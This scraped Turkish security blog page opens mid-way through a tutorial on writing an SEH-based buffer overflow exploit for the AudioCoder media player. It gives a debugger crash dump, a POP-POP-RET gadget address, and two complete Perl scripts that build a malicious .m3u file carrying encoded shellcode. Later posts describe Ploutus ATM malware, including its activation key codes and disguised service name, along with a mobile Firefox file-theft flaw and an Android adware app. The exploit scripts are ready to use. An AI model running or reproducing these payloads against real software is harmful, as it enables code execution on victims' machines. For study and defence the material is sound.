Aldıgımız cıktılar.<br />
<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
eax=004b5f30 ebx=00193360 ecx=02663a20 edx=00000264 esi=7e37f3c2 edi=004b5f30<br />
eip=90909090 esp=0012e4fc ebp=0012e714 iopl=0 nv up ei pl nz na po nc<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202<br />
Missing image name, possible paged-out or corrupt data.<br />
90909090 ?? ???<br />
<br />
Ekran Görüntüsü Eklersek!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4ffi7KmtP5FjQ4mtx3vfMtThrbrNckEnO3WIApqe1bJUHsDFSUcihrN0_cQ5C9AaAwNrWRHM4GhnvviVDwYxK0IZYN_nUy50eu2rTjmH8q1C_6k-N0KN6E5luZ3mftlpk1nReuo67Y8/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4ffi7KmtP5FjQ4mtx3vfMtThrbrNckEnO3WIApqe1bJUHsDFSUcihrN0_cQ5C9AaAwNrWRHM4GhnvviVDwYxK0IZYN_nUy50eu2rTjmH8q1C_6k-N0KN6E5luZ3mftlpk1nReuo67Y8/s400/1.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
Dikkat edeceğiniz üzere !exchain komutuyla aldıgımız cıktı dogru buffer i bulamadıgımız KERNEL32 ffffff cıktısından farklı bir stack adresi icermekte. Buda dogru buffersize i yakaladıgımızı kanıtlamakta simdi yapmamız gereken sey SEH Based exploit icin gerekli formülümüzü tutturmak ve istediğimiz shellcode u sistem üzerinde calıstırmak.<br />
<br />
FORMÜL: JunkBuffer + NEXTSEH + POP+POP+RET + SHELLCODE<br />
<br />
Junksize imizi bulugumuza göre simdi bulmamız gereken findjump yada baska bir arac kullanabilirsiniz ilk tercih program dll leri icinde olmalı cünkü yazdıgımız exploitin bütün isletim sistemi versiyonlarında calısmasını istiyoruz. Yoksa KERNEL32 v.b windows dll leri icinde arayacagız bu durumda yazmıs oldugumuz exploit sadece o windows sürümünde calısacaktır. Ben burda findjump kullanacağım.<br />
<br />
Burda program klasorundeki tüm dll lerde bu islemi yapabilirsiniz. ben yine uzatmadan libiconv-2.dll üzerinde findjump ile edi registerini aratıyorum ve cıktı asagidaki gibi olmalı burda pop - edi , pop , ret olanlardan herhangi bir tanesini SEH Handler olarak kullanabiliriz.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD42y3wdS3A0t4Drm7FLgJ0ksUr7338hfk_S1fQeo7MbDIn8WNF0UmHClsEhExBXxxNHicCdzw1e9eNQwwN7MKDK1ASPks9wf0dmBDZBA73Gcf3aW6dreBkFbK1b15o95a6ye6iKrk1GY/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD42y3wdS3A0t4Drm7FLgJ0ksUr7338hfk_S1fQeo7MbDIn8WNF0UmHClsEhExBXxxNHicCdzw1e9eNQwwN7MKDK1ASPks9wf0dmBDZBA73Gcf3aW6dreBkFbK1b15o95a6ye6iKrk1GY/s320/2.PNG" width="320" /></a></div>
<br />
Benim aldığım değer : 0x66014D22<br />
<br />
Bundan sonra Calculator exe shellcodu muzuda perl dosyamıza ekleyerek dogru NEXT seh değerini bulmamız gerekmekte. Buda gercek shellcode umuzu calıstırmak icin gerekli olan Atlama sayısını byte cinsinden bulmamız anlamına geliyor. Gercek exploit writer in 20 Byte Jump ettiğini görmekteyiz ve total buffer size olarak ta 5000 Byte kullandıgını görmekteyiz. Yazımın basında dediğim gibi biz burda inceliyoruz fakat yeni bir exploit kodu yazıyoruz. Ve benim yazmıs oldugum kodda 5000 Byte sınırı olmadıgı gibi NextSEH icin kullandıgım atlama degeri sadece 6 Byte olucak. Ve Exploitimizi Tamamlarsak.<br />
<br />
$uitxt = "exp.m3u";<br />
<br />
my $junk = "http://" . ("\x90" x 757); #Buffer Junk<br />
my $nseh = "\xeb\x06\x90\x90"; # overwrite (6 bytes)<br />
my $seh = pack('V',0x66014D22);<br />
my $shellcode =<br />
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".<br />
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".<br />
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".<br />
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".<br />
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".<br />
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".<br />
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".<br />
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".<br />
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".<br />
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".<br />
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".<br />
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".<br />
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".<br />
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".<br />
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".<br />
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".<br />
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".<br />
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".<br />
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".<br />
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".<br />
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".<br />
"\x4e\x36\x43\x46\x42\x50\x5a";<br />
<br />
open(myfile,">$uitxt") ;<br />
print myfile $junk.$nseh.$seh.$shellcode;<br />
<br />
Yarattıgımız Exploit dosyasını programda actıgımızda elde ettiğimiz ekran goruntusu!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEillW3S6paoowxaFzHCX3IJOz7pb7CKxDZIfRkCOOs7b44DnYMtKkwszCYXcuEWkUtQ4DOdyyD89nsvnsJ7RHsdhaP2V5YCjLgdIEQTiwA7AhO1fjYDFiiMojfKqkGOKlDXnCJhI3d2jP8/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEillW3S6paoowxaFzHCX3IJOz7pb7CKxDZIfRkCOOs7b44DnYMtKkwszCYXcuEWkUtQ4DOdyyD89nsvnsJ7RHsdhaP2V5YCjLgdIEQTiwA7AhO1fjYDFiiMojfKqkGOKlDXnCJhI3d2jP8/s320/3.PNG" width="320" /></a></div>
<br />
<br />
Orjinal Exploit Dosyası: Burdanda göreceğiniz üzere 20 byte atlamamız fazladan NOPs larımız yeni yazdıgımızda mevcut değil ayrıca 5000 Byte sınırınında olmadıgını pack ettiği adresin farklı adres oldugunu görmektesiniz.<br />
<br />
<div class="line number15 index14 alt2">
<code class="perl keyword">my</code> <code class="perl variable">$buffsize</code> <code class="perl plain">= 5000; </code><code class="perl comments"># sets buffer size for consistent sized payload</code></div>
<div class="line number16 index15 alt1">
<code class="perl keyword">my</code> <code class="perl variable">$junk</code> <code class="perl plain">= </code><code class="perl string">"http://"</code> <code class="perl plain">. (</code><code class="perl string">"\x90"</code> <code class="perl plain">x 757); </code><code class="perl comments"># offset to seh overwrite </code></div>
<div class="line number17 index16 alt2">
<code class="perl keyword">my</code> <code class="perl variable">$nseh</code> <code class="perl plain">= </code><code class="perl string">"\xeb\x14\x90\x90"</code><code class="perl plain">; </code><code class="perl comments"># overwrite next seh with jmp instruction (20 bytes)</code></div>
<div class="line number18 index17 alt1">
<code class="perl keyword">my</code> <code class="perl variable">$seh</code> <code class="perl plain">= </code><code class="perl functions">pack</code><code class="perl plain">(</code><code class="perl string">'V'</code><code class="perl plain">,0x6601228e); </code><code class="perl comments">#overwrite seh w/ pop edi pop ebp ret from AudioCoder\libiconv-2.dll </code></div>
<div class="line number19 index18 alt2">
<code class="perl keyword">my</code> <code class="perl variable">$nops</code> <code class="perl plain">= </code><code class="perl string">"\x90"</code> <code class="perl plain">x 20; </code></div>
<div class="line number20 index19 alt1">
</div>
<div class="line number21 index20 alt2">
<code class="perl comments"># Calc.exe payload [size 227]</code></div>
<div class="line number22 index21 alt1">
<code class="perl comments"># msfpayload windows/exec CMD=calc.exe R | </code></div>
<div class="line number23 index22 alt2">
<code class="perl comments"># msfencode -e x86/shikata_ga_nai -c 1 -b '\x00\x0a\x0d\xff'</code></div>
<div class="line number24 index23 alt1">
<code class="perl keyword">my</code> <code class="perl variable">$shell</code> <code class="perl plain">= </code><code class="perl string">"\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"</code> <code class="perl plain">.</code></div>
<div class="line number25 index24 alt2">
<code class="perl string">"\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"</code> <code class="perl plain">.</code></div>
<div class="line number26 index25 alt1">
<code class="perl string">"\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"</code> <code class="perl plain">.</code></div>
<div class="line number27 index26 alt2">
<code class="perl string">"\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"</code> <code class="perl plain">.</code></div>
<div class="line number28 index27 alt1">
<code class="perl string">"\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"</code> <code class="perl plain">.</code></div>
<div class="line number29 index28 alt2">
<code class="perl string">"\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"</code> <code class="perl plain">.</code></div>
<div class="line number30 index29 alt1">
<code class="perl string">"\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"</code> <code class="perl plain">.</code></div>
<div class="line number31 index30 alt2">
<code class="perl string">"\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"</code> <code class="perl plain">.</code></div>
<div class="line number32 index31 alt1">
<code class="perl string">"\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"</code> <code class="perl plain">.</code></div>
<div class="line number33 index32 alt2">
<code class="perl string">"\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"</code> <code class="perl plain">.</code></div>
<div class="line number34 index33 alt1">
<code class="perl string">"\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"</code> <code class="perl plain">.</code></div>
<div class="line number35 index34 alt2">
<code class="perl string">"\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"</code> <code class="perl plain">.</code></div>
<div class="line number36 index35 alt1">
<code class="perl string">"\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"</code> <code class="perl plain">.</code></div>
<div class="line number37 index36 alt2">
<code class="perl string">"\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"</code> <code class="perl plain">.</code></div>
<div class="line number38 index37 alt1">
<code class="perl string">"\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"</code> <code class="perl plain">.</code></div>
<div class="line number39 index38 alt2">
<code class="perl string">"\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"</code> <code class="perl plain">.</code></div>
<div class="line number40 index39 alt1">
<code class="perl string">"\x9a\xca\xc0"</code><code class="perl plain">;</code></div>
<div class="line number41 index40 alt2">
</div>
<div class="line number42 index41 alt1">
<code class="perl comments"># fill remainder of buffer with junk chars; not necessary but useful</code></div>
<div class="line number43 index42 alt2">
<code class="perl comments"># to check remaining usable space for different sized payloads</code></div>
<div class="line number44 index43 alt1">
<code class="perl keyword">my</code> <code class="perl variable">$fill</code> <code class="perl plain">= </code><code class="perl string">"\x43"</code> <code class="perl plain">x (</code><code class="perl variable">$buffsize</code> <code class="perl plain">- (</code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$junk</code><code class="perl plain">)+</code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$nseh</code><code class="perl plain">)+</code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$seh</code><code class="perl plain">)+</code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$nops</code><code class="perl plain">)+</code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$shell</code><code class="perl plain">))); </code><code class="perl comments"># fills remainder of buffer </code></div>
<div class="line number45 index44 alt2">
</div>
<div class="line number46 index45 alt1">
<code class="perl keyword">my</code> <code class="perl variable">$buffer</code> <code class="perl plain">= </code><code class="perl variable">$junk</code><code class="perl plain">.</code><code class="perl variable">$nseh</code><code class="perl plain">.</code><code class="perl variable">$seh</code><code class="perl plain">.</code><code class="perl variable">$nops</code><code class="perl plain">.</code><code class="perl variable">$shell</code><code class="perl plain">.</code><code class="perl variable">$fill</code><code class="perl plain">; </code></div>
<div class="line number47 index46 alt2">
</div>
<div class="line number48 index47 alt1">
<code class="perl comments"># write the exploit buffer to file</code></div>
<div class="line number49 index48 alt2">
<code class="perl keyword">my</code> <code class="perl variable">$file</code> <code class="perl plain">= </code><code class="perl string">"audiocoder.m3u"</code><code class="perl plain">;</code></div>
<div class="line number50 index49 alt1">
<code class="perl functions">open</code><code class="perl plain">(FILE, </code><code class="perl string">">$file"</code><code class="perl plain">);</code></div>
<div class="line number51 index50 alt2">
<code class="perl functions">print</code> <code class="perl plain">FILE </code><code class="perl variable">$buffer</code><code class="perl plain">;</code></div>
<div class="line number52 index51 alt1">
<code class="perl functions">close</code><code class="perl plain">(FILE);</code></div>
<div class="line number53 index52 alt2">
<code class="perl functions">print</code> <code class="perl string">"Exploit file created ["</code> <code class="perl plain">. </code><code class="perl variable">$file</code> <code class="perl plain">. </code><code class="perl string">"]\n"</code><code class="perl plain">;</code></div>
<div class="line number54 index53 alt1">
<code class="perl functions">print</code> <code class="perl string">"Buffer size: "</code> <code class="perl plain">. </code><code class="perl functions">length</code><code class="perl plain">(</code><code class="perl variable">$buffer</code><code class="perl plain">) . </code><code class="perl string">"\n"</code><code class="perl plain">; </code></div>
<div class="line number54 index53 alt1">
</div>
<div class="line number54 index53 alt1">
</div>
Teknik bir makale oldu. Fakat Yerel güvenlik zafiyetlerine güzel bir örnek oldugunu düsünmekteyim... Herkese simdiden iyi çalışmalar!!!! <br />
<br />
<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-31936386605817737862013-11-06T11:21:00.000-08:002014-12-30T07:07:19.591-08:00Hacker'lar ATM'leri ploutus ile selamladılar!<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Selamlar, 10 Ekim 2013 itibariyle su an icin sadece meksikada ATM lerde tespit edilen bir virus ve saldırganların yapabildiklerine biraz değinmek istiyorum.<br />
<br />
Öncelik daha once bircok varyasyon ile hackerların kisilerin banka bilgilerini, sifrelerini ATM lere kurdukları düzenekler ile calarak milyonlarca liralık soygunlar yaptıklarını biliyoruz fakat bu ortaya cıkan ploutus virusu tarihte ilk olarak sadece ATM lere yüklenerek sahıslardan değil bankalardan para calmaya yönelik virus olma yolunda bir ilk olmaktadır.<br />
<br />
Nedir bu ploutus nasıl calısır ?<br />
<br />
Ploutus bunu yazanın verdigi isimle .NET tabanlı yazılmıs bir virustur. Backdoor diyemiyeceğim cunku ploutus un actıgı arka kapı internet üzerinde belli bir port değil direk tus kombinasyonları ile ATM yazılımına belli islemleri yetkisiz yapmanıza yarayan bir arka kapı acmakta. Kısacası olay söyle gerceklesmekte. Saldırganlar fiziksel güvenliğin zayıf oldugu bir ATM yi belirleyerek ATM nin icindeki PC nin durdugu kısmı acarak üzerindeki CD-ROM sayesinde virusu ATM PC sine yüklüyolar. Sonrasında tekrar virüs yükledikleri ATM ye ugrayarak belli rakam kombinasyonlarını kullanarak ATM 'nin modlarını değiştirerek yetkisiz para cekim islemi gerceklestiriyolar. Simdi size ploutus'tan birkac fotograf göstereceğim.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOcWLvh5YYc61rQvE1WE9SIeqxxzHUhuoB8i3IXMSj7FgP2xrcBtHQ_4x4V0cs4xoBZ4lt3HsoaUw_93JhsSDE-yRQyRdfSZn_MaObJ-oEZ7X0bntZuLgyGR_sVRerNat6Zqgmft1zoI/s1600/6a0133f264aa62970b019affe9a016970b-800wi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOcWLvh5YYc61rQvE1WE9SIeqxxzHUhuoB8i3IXMSj7FgP2xrcBtHQ_4x4V0cs4xoBZ4lt3HsoaUw_93JhsSDE-yRQyRdfSZn_MaObJ-oEZ7X0bntZuLgyGR_sVRerNat6Zqgmft1zoI/s640/6a0133f264aa62970b019affe9a016970b-800wi.png" height="203" width="640" /></a></div>
<br />
Burda virüs dosyası ATM PC sinde calıstıgı anda kendisi otomatik calısan NCRDRVPS adında bir servis olarak kaydetmekte. Burda NCR v.b isimlerin kullanımı bankanın IT güvenlik ekiplerinin virusu kendi servisleri zannetmelerini saglamaktır.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3luSnjZ_JhSXINJNd0JbYgilLc7BZ43o4cZwJ6X4NsUyqf1tK6vprpbgMh2kMxz5nqT1arkeOjpQUuX3HNebzU1ucVlaj5eJfHkEeBQ8_Gq0h12BpkeXEGyiSzjjM4aqpYkjhAaibitw/s1600/6a0133f264aa62970b019affea1957970d-800wi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3luSnjZ_JhSXINJNd0JbYgilLc7BZ43o4cZwJ6X4NsUyqf1tK6vprpbgMh2kMxz5nqT1arkeOjpQUuX3HNebzU1ucVlaj5eJfHkEeBQ8_Gq0h12BpkeXEGyiSzjjM4aqpYkjhAaibitw/s640/6a0133f264aa62970b019affea1957970d-800wi.png" height="342" width="640" /></a></div>
<br />
Buda ploutus virüsünün yüklendiğinde saldırganın belli tus kompinasyonlarını kullanarak actıgı ekranı. Örnegin saldırgan 100018526 gibi ATM tuslarına belli sırada bastıgında bu ekranı acarak yapmak istedikleri islemleri secebilmekteler.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuRoqPKSdCAtPkhEJ4ch11tuohGeIAo_zMumw45dC5pqMyAoCXkq5OIEv-FVegz16tRllTNOrTbJMJFNzUPRMzoDGbuYTURdz0nm-Ct989Q3orHF5GCVBspEMdIdMRChX7rqn_Y0j5g04/s1600/6a0133f264aa62970b019affea2495970d-800wi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuRoqPKSdCAtPkhEJ4ch11tuohGeIAo_zMumw45dC5pqMyAoCXkq5OIEv-FVegz16tRllTNOrTbJMJFNzUPRMzoDGbuYTURdz0nm-Ct989Q3orHF5GCVBspEMdIdMRChX7rqn_Y0j5g04/s640/6a0133f264aa62970b019affea2495970d-800wi.png" height="366" width="640" /></a></div>
Burdaki ekranda saldırganın belirlediği aktivasyon kodu sırasıyla 0 0 0 1 1 6 6 7 tuslarına basıldıgında ploutus u aktif etmek icin programlandıgını gormektesiniz. Bu sayede meksikada milyonluk soygun gerceklesmis olmaktadır. Bunun ülkemizde olma olasılıgınıda göz önüne alırsak sadece bilisim değil fiziksel güvenliğinde nekadar önemli oldugunu bizlere ve özelliklede bankacılık sektorunde calısan meslektaslarımıza göstermis oldular.<br />
<br />
Genel olarak söylenen gibi güvenlik bir zincirdir en zayıf halkadan kırılır. Burdaki zayıf halka fiziksel güvenlik olmaktadır.</div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-51848637608612837612013-11-06T11:01:00.001-08:002014-07-25T12:17:32.309-07:00Firefox güvenlik açığı<div dir="ltr" style="text-align: left;" trbidi="on">
<p>Firefox güvenlik açığı ile ilgili konumuzla birlikte Uzunca bir aradan sonra tekrar selamlar,</p><br />
<br />
Akıllı telefonlarla birlikte hayatımıza yeni güvenlik riskleride girmeye basladı. Bir coguda kisisel verilere yonelik tehlikeler olarak yaygınlastılar. Zeus v.s exploit packlerin bankacılık islemlerine yonelik olan güvenlik zaafiyelerini zaten bilmekteyiz. Bazı virüslü programlar sayesinde tek kullanımlık sifreleriniz saldırganların eline gecmekte. Burda değineceğimiz konu firefox web tarayıcınısı kullanan mobil telefonlarla ilgili.<br />
<br />
Firefox versiyonlarının son sürüm dahil etkilendiği bu güvenlik zaafiyeti sayesinde saldırgan karsı taraftaki kişinin SD kart dosyalarına yetkisiz erisim saglayabiliyor. Daha acık bir dille anlatırsak sizi güvenlik zaafiyeti olan bir siteye girmeniz için ikna ediyor. Siz mobil tarayıcınızdan bu adrese girdiginiz saldırganın size yollagını bir exploit datası sayesinde sizin SD kartınız icindeki dosyaları kendisine yükletebiliyor. Bu sayede saldırgan sizin cookie veritabanıza ulasarak oturumu acık tut diye isaretlediginiz sitelere cookieleri tekrar düzenleyerek sifresiz erisim saglayabiliyor. Saldırgan bu güvenlik acıgını bir black markette satısa cıkarmıs durumda. Olayı daha iyi kavrayabilmek adına saldırganın cektiği videoyu yayınlıyorum.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.blogger.com/video.g?token=AD6v5dxPb_pZVJDrwMLsn-cyGTWEr1JqK0DIBp7rKfCoDFUb_g1bY2s4235B72Jpenidy0KpIL6BVhhsO_GzS38_ew' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
<div style="text-align: center;">
Daha kaliteli seyretmek icin link: <a href="http://www.youtube.com/watch?v=q74g58kX5lQ" target="_blank">http://www.youtube.com/watch?v=q74g58kX5lQ</a> </div>
<div style="text-align: center;">
<br /></div>
Bu yüzden 3rd party bir tarayıcı kullanıyosanız kisisel verilerinizinde bu gibi güvelik acıkları sayesinde tehlikeli oldugunu unutmayınız ve gerekli değilse kesinlikle uzun süreli oturum acık tutmayınız. Her giriste tekrar sifreleriniz ile giris yapınız eger mumkun ise Authy gibi 2 factor dogrulama ile hesaplarınıza tek kullanımlık sifre ile giris yapınız. Sifrelerinizin tarayıcılar tarafından hatırlanmasına izin vermeyiniz.<br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/00334229859513933055noreply@blogger.com0tag:blogger.com,1999:blog-5535745453276958903.post-46291581321934778582013-09-11T14:38:00.001-07:002013-11-23T06:25:01.477-08:00Android Aplikasyonlarında Kişisel Verilerinizi Bekleyen Tehlike!<div dir="ltr" style="text-align: left;" trbidi="on">
Selamlar,<br />
<br />
İlk blogumdaki ilk yazıma başlamadan önce biraz kendimden bahsetmek istedim. IT güvenliği ile ilgili bir şirket bünyesinde çalışmaktayım. Birçok konferans, etkinlik ve çalıştaylarda konuşmacı olarak bulundum. Son olarak 59 yıldır ABD de düzenlenen AsisInternational 2013 te presenter speaker olarak bulunacağım (25 Eylül 2013).<br />
<br />
Günümüzde akıllı telefonların hızla yayılmasından sonra birçok uygulama geliştiricide kendi uygulamalarını geliştirerek gerek faydalı araçlar olsun gerekse oyun, eğlence gibi aplikasyonlarını google play bünyesinde yayınlamaya başladılar. Hızla büyüyen mobil aplikasyon piyasası içinde kötü oyuncularında yerini alması gecikmedi tabiki. Geçtiğimiz günlerde kendi android sistemli telefonumda play storeda gezerken bir aplikasyon ve istediği gereksiz izinler dikkatimi çekti. Bende hemen yapan geliştiricinin diğer aplikasyonlarına gecerek benzer icerikte birden fazla aplikasyon yayınladığını gördüm ve işim gereği APK sını download ederek incelemeye başladım.<br />
<br />
Fazla teknik olmaması açısından Decompile v.b işlemlerin nasıl yapıldığını uzun uzun buraya yazarak yazıyı uzatıp sizlerinde canını sıkmayacağım aynı durumlara sizin düsmemeniz acısından bazı ekran görüntüleri ve linkler yayınlayarak siz teknoloji severlerin bu aplikasyonun tuzağına düşmesini engellemeye çalışacağım.<br />
<br />
Geliştiricinin Play Linki: <a href="https://play.google.com/store/apps/developer?id=E%C4%9Flenerek+%C3%96%C4%9Fren">https://play.google.com/store/apps/developer?id=E%C4%9Flenerek+%C3%96%C4%9Fren</a><br />
<br />
Decompile işlemine tabi tuttuğum uygulamanın linki: <a href="https://play.google.com/store/apps/details?id=tr.sibelkekilli">https://play.google.com/store/apps/details?id=tr.sibelkekilli</a><br />
<br />
Elde ettiğim ekran görüntüleri ve uygulamanın Malware oldugunu kanıtlayan kanıtlar:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPa32KVkRoh7xtpul8Bc0h_-B50IF5JdbJg25qyczBNhGjbxaHjkRTaYtgeQE1uUzxBBZCWTmIF-S2vs5vj5aloMCiy0WZuHGiAtiNalBkHPu38KNc-bnUB8utY7fOfbt2CCk1aosTVOM/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPa32KVkRoh7xtpul8Bc0h_-B50IF5JdbJg25qyczBNhGjbxaHjkRTaYtgeQE1uUzxBBZCWTmIF-S2vs5vj5aloMCiy0WZuHGiAtiNalBkHPu38KNc-bnUB8utY7fOfbt2CCk1aosTVOM/s1600/1.PNG" /></a></div>
<br />
Üstte gördüğümüz ekranda apperhand malware inin içinde bundle edilmiş oldugunu ve yandada uzaktan aldığı komutların listesini görmekteyiz. Basit bir google aramasıyla apperhand hakkında yabancı kaynaklardan detaylı bilgiye ulaşabilirsiniz. Ben fazla teknik boyuta girmeyeceğim.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzx75zZGF6MYTbDNjeTUqCw4BQOjnpl68ZmQFUK6n1ZPpXiWcvhM80Cz8uSgK-v7EvGaK6qW0QZIvwGcOx_z4yHDA3tiasChEFouqq4ToZ4fzbic-dKyNhUyABEuFshOkoFuQhH6yBNk8/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzx75zZGF6MYTbDNjeTUqCw4BQOjnpl68ZmQFUK6n1ZPpXiWcvhM80Cz8uSgK-v7EvGaK6qW0QZIvwGcOx_z4yHDA3tiasChEFouqq4ToZ4fzbic-dKyNhUyABEuFshOkoFuQhH6yBNk8/s1600/2.PNG" /></a></div>
<br />
Yukarındada yine baska bir görüntüde aplikasyonunun RevMob Id sini görebilirsiniz. Aplikasyonun herhangi bir içeriği olmamakla birlikte bircok Adaware i size zorla izlettirerek yada actırarak tamamen duygusal :) para kazanmak icin yapıldığı ve insanların birçok kişisel verisinin saklandıgı görülmektedir.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
